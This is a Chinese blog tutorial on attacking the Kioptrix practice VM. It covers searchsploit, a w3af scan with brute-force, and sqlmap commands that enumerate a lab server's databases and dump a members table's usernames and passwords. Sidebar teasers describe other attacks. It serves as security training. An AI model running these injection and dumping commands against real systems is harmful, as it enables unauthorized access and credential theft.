渗透测试漏洞利用之漏洞攻击

最新推荐文章于 2024-04-03 09:59:55 发布
最新推荐文章于 2024-04-03 09:59:55 发布
阅读量1.4w 收藏 12
点赞数 3
分类专栏: 网络安全 渗透测试 文章标签: 渗透测试 漏洞利用 w3af sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jeanphorn/article/details/46496469
版权

1. 查找目标系统的相关漏洞

  在前一篇渗透测试的博文中,介绍了目标系统相关信息的收集方法。接下来,任意Kioptrix靶机为例,具体介绍下相关漏洞的详细利用过程。
  在exploit-db.com网站上,一般能够找到已知漏洞的有价值的信息,以及验证其有效性的概念验证代码(POC)。概念验证代码可以帮助你理解这个漏洞的原理和形成机制,从而让你能够确定防护措施是否正常工作。

2. 离线的漏洞库

  在Kali Linux中,自动包含了一份漏洞库在/usr/share/exploitdb/中。使用searchsploit命令进行搜素漏洞。
  # searchploit samba

  

  
  这是列出了samba服务器对应版本的各种漏洞信息,仔细查看,并没有我们目标系统samba服务器(上一章博文中最后扫描中列出)3.0.28a相关的漏洞,这时我们可以去网上搜所,也可以更新本地的漏洞库,这里不作详述了。

3. 使用w3af工具

  w3af是一个web漏洞扫描利用的神器。下面介绍一下他的使用方法。在Kali Linux的终端下输入w3af_gui,启动它的图形界面版。

  

  
  然后在scan config中选择“full_audit”,勾选bruteforce插件,再在Target地址栏中输入目标靶机的URL,然后点击“Start”开始扫描。

  

  
  在log标签栏中可以查看扫描的日志。

  

  
  在Result标签栏中可以查看扫描的结果,在结果中可以看到一些红色标记的漏洞,有sqli(SQL注入)漏洞,click_hajacking漏洞。这些都是可利用的漏洞。

  
  

4. 使用sqlmap进行sql注入

  1). 使用sqlmap命令,dump出入侵所需要用到的数据库信息。
  # sqlmap -u 192.168.50.102/checklogin.php --data mypassword=1

  **注意:**192.168.50.102提供的登录服务是POST的方式,要用–data选项,后跟要发送的内容。

  

  使用下列命令列出所有的数据库。
`sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 --dbs

  

  
  查看members数据库的内容:
  sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members --tables

  

  
  列出表的列名:
 sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members --columns

  

  
  列出表内容:
  # sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members -C username,password --dump
  

  
jeanphorn
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞扫描模拟攻击方法实验
12-14
漏洞扫描模拟攻击方法实验漏洞扫描模拟攻击方法实验
系统漏洞攻击
m0_52528594的博客
05-31 1291
1隐藏自己的行踪 攻击者入侵就是要神不知鬼不觉地侵入到目标计算机,因此,在入侵攻击之前要对自己做个伪装,不能让被攻击者轻易发现。在通过网络对目标计算机发起攻击之前,先对自己真实的IP地址隐藏。一般攻击者都是用他人的电脑来隐藏自己真实的IP地址的。 2查询分析目标计算机攻击要有目标,在网络中的IP地址就能够真正标识一个在网的计算机,而域名是为了更好地对IP地址进行记忆管理的另一种显现方式,这样用域名和IP地址就能确定目标计算机了。确定了目标计算机之后,就可以对其操作系统类型及所提供的服务等信息,做一个全方
探索Goby POC:一款强大的安全验证工具
最新发布
gitblog_00007的博客
04-03 416
探索Goby POC:一款强大的安全验证工具 项目地址:https://gitcode.com/TheTh1nk3r/Goby_POC 项目简介 Goby POC 是一个开源项目,由开发者TheTh1nk3r创建,旨在为网络安全专业人士提供一种高效的方法来进行漏洞证明(Proof of Concept, PoC)。通过这个项目,你可以快速构建和测试安全漏洞,从而提升你的渗透测试漏洞评估能力。 技...
软件开发团队的护网低成本应对方案
明光札记
05-01 827
1、在控制成本与关注核心效果的情况下主要对于0click漏洞进行重点测试加固,对于1click漏洞可以酌情开展;
渗透攻击漏洞用实验(ms08-067、samba漏洞用,ms03-026漏洞用并长期保持)
qq_20381661的专栏
04-10 4618
(一)对MS08_067漏洞渗透攻击 1.使用msfconsole启动Metasploit终端,进入后使用search命令,搜索该漏洞对应的模块: 2.启用这个攻击模块,查看信息,设置攻击载荷: 3.查看渗透攻击所需的配置选项: 4.根据具体情况配置渗透攻击各个选项,并查看设置后的情况: 5.使用exploit发起渗透攻击,获得shell并进行简单操作: (二)用samba漏洞 1.使用seach命令搜索samba漏洞对应的模块: 2.启用usermap_s
永恒之蓝漏洞用及攻击
liver100day的博客
04-17 5030
永恒之蓝漏洞用及攻击 1.基础知识介绍 什么是永恒之蓝漏洞? 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具, “永恒之蓝”用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒, 英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 2.什么是SMB协议? S
CSRF漏洞的概念、用方式、防御方案
好好睡觉
03-19 3445
CSRF漏洞的概念,用方式、防御方案
跨站脚本攻击深入解析之:漏洞用过程
blackbean的专栏
03-09 870
跨站脚本的名称源自于这样一个事实,即一个Web站点(或者人)可以把他们的选择的代码越过安全边界线注射到另一个不同的、有漏洞的Web 站点中。当这些注入的代码作为目标站点的代码在受害者的浏览器中执行时,攻击者就能窃取相应的敏感数据,并强迫用户做一些用户非本意的事情。  在本文的上篇中,我们详细介绍了当前Web应用所采取的安全措施,如同源策略、cookie安全模型以及Flash的安全模型;
漏洞用篇(上)
m0_57929980的博客
06-16 6374
漏洞用篇:介绍漏洞用的基本概念及示例,主要讲解Shellcode的编写与编码
(23)【漏洞用】【原理、用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞
03-16 7722
实战为本,理论先行
漏洞用技术讲解,漏洞分析与用技巧
白帽子凯哥聊黑客
12-07 1327
在网络安全领域,我经常会被问到关于漏洞用的问题。作为一个长期从事网络安全研究的小哥哥,我明白漏洞用的重要性,将通过这篇文章分享给大家。
漏洞用工具
09-29
1)对漏洞进行检索和排查; 2)对漏洞进行用和修复。
漏洞用与提权
09-20
ID tdcoming 的白帽子的演讲PPT,共43页。详细介绍了漏洞用的各个步骤,值得一看
java_rmi漏洞用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
渗透测试技术之本地文件包含
02-25
在Web程序渗透测试中,用本文中的技术发现的LFI漏洞渗透测试中的典型漏洞。此外,在本文中提到有一些技术,在CTF大赛中也经常被用。LFI允许攻击者通过浏览器包含一个服务器上的文件。当一个WEB应用程序在没有...
渗透测试服务介绍_脆弱性识别
05-04
漏洞用】:渗透测试服务团队可以深入对发现的漏洞进行分析,确认漏洞可被用的可能性,充分评估目标系统的安全风险水平 渗透测试除了可全面准确的发现目标系统的安全漏洞和隐患外,通过渗透测试还可以对目标...
Log4j2漏洞检测工具
02-06
Apache log4j 2是一款...经验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等众多组件与大型应用均受影响,该漏洞无需授权即可远程代码执行,一旦被攻击用会造成严重后果,影响范围覆盖各行各业。
MySQL数据库渗透漏洞用总结
05-09 4051
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
网络安全之渗透实战学习
Innocence_0的博客
10-16 934
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
防止struts漏洞渗透测试人员的好处
05-28
防止Struts漏洞渗透测试人员的好处主要有以下几点: 1. 提高渗透测试的难度:如果应用程序存在Struts漏洞渗透测试人员可以很容易地用这种漏洞来获取应用程序中的敏感信息或者控制应用程序。防止Struts漏洞可以有效地提高渗透测试的难度,让渗透测试人员更难以攻击目标应用程序。 2. 保护应用程序的安全:Struts漏洞是一种常见的安全漏洞,如果不及时修复,就会给应用程序带来很大的安全风险。防止Struts漏洞可以保护应用程序的安全,防止它们被黑客攻击。 3. 提高渗透测试人员的技能:防止Struts漏洞需要渗透测试人员具备更高的技术水平和更深入的了解,这可以帮助他们提高技能,从而更好地完成渗透测试任务。 总之,防止Struts漏洞渗透测试人员是有好处的,可以提高渗透测试的难度,保护应用程序的安全,同时也可以提高渗透测试人员的技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值